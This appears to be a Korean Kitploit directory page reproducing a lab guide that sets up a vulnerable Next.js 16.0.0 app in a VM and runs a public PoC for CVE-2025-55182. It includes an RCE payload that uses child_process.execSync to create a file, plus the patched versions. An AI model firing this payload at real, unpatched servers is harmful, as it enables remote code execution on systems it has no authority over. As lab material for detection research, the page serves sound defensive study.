Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-55182-poc-test — React Server Components를 사용하는 Next.js 16.0.0에 대한 CVE-2025-55182 원격 코드 실행을 시연하는 재현 가능한 랩으로, 외부 익스플로잇 실행 및 부작용 검증을 포함합니다. | Kitploit
도구/GitHubGitHub/jandelima/cve-2025-55182-poc-test
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

React Server Components를 사용하는 Next.js 16.0.0에 대한 CVE-2025-55182 원격 코드 실행을 시연하는 재현 가능한 랩으로, 외부 익스플로잇 실행 및 부작용 검증을 포함합니다.

저장소 보기
38개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 실습 랩 (Next.js / React RSC RCE)

이 문서는 취약한 Next.js + React Server Components 환경에서 실행되는 CVE-2025-55182 원격 코드 실행(RCE)을 시연하기 위한 완전하고 재현 가능한 설정을 제공합니다. 해당 환경은 Multipass Ubuntu VM 내부에서 실행됩니다.

익스플로잇은 VM 외부에서 실행되며, 원격 악용 가능성을 입증하고 비정상 행동 탐지를 위한 환경을 준비합니다.

소스: https://github.com/ejpir/CVE-2025-55182-research


1. Ubuntu VM 생성 및 준비

2. VM 내부 기본 설정

2.1 시스템 업데이트 및 의존성 설치

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Node.js LTS(20.x) 설치

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

확인:

root@kitploit:~
node -v
npm -v

2.3 앱 전용 사용자 생성

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. 취약한 Next.js 앱 배포

3.1 작업 디렉터리 생성

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 기본 Next.js App Router 프로젝트 생성

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 package.json에서 취약한 버전 고정

의존성 편집:

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

패키지 재설치:

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

확인:

root@kitploit:~
npm list react react-dom next

예상 출력:

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 프로덕션 모드로 빌드 및 실행

root@kitploit:~
npm run build
npm start

예상 출력:

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

start


4. 외부 접근 가능 여부 확인 (공격자 머신 → VM)

다른 머신에서:

root@kitploit:~
curl http://10.102.169.126:3000

기본 Next.js HTML 페이지가 응답으로 와야 합니다.


5. 공격자 머신에서 PoC 클론 및 테스트

5.1 저장소 클론

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 PoC가 서버 IP를 가리키도록 설정

다음을 찾아서:

root@kitploit:~
hostname: 'localhost',

다음으로 교체:

root@kitploit:~
hostname: '10.X.X.X',

5.3 기본 PoC 실행 (간단한 console.log RCE)

Next가 계속 실행 중인 상태에서:

root@kitploit:~
node test-simple.cjs

Next.js 터미널에서 예상 출력:

root@kitploit:~
NON-CHUNKED-RCE

이는 취약한 버전을 사용한 React Flight를 통한 원격 코드 실행을 확인합니다.

confirmed


6. 가시적인 부수 효과(파일 생성)를 수행하도록 PoC 수정

목표는 관찰 가능한 동작(파일시스템 + 프로세스 실행)을 생성하는 것입니다.

6.1 test-simple.cjs 내부의 _prefix 편집

다음을 찾아서:

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

다음으로 교체:

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

참고: 실행 컨텍스트에서는 require를 사용할 수 없지만 process.mainModule.require()는 사용할 수 있습니다.

6.2 수정된 익스플로잇 테스트

Next가 실행 중인지 확인한 후:

root@kitploit:~
node test-simple.cjs

파일 생성 확인:

root@kitploit:~
ls -l /tmp/

다음이 보여야 합니다:

root@kitploit:~
cve-2025-55182-syscall

이는 부수 효과가 있는 기능적 RCE를 확인합니다.

start


패치:
React ≥ 19.2.1
Next.js ≥ 16.0.7

도구 다운로드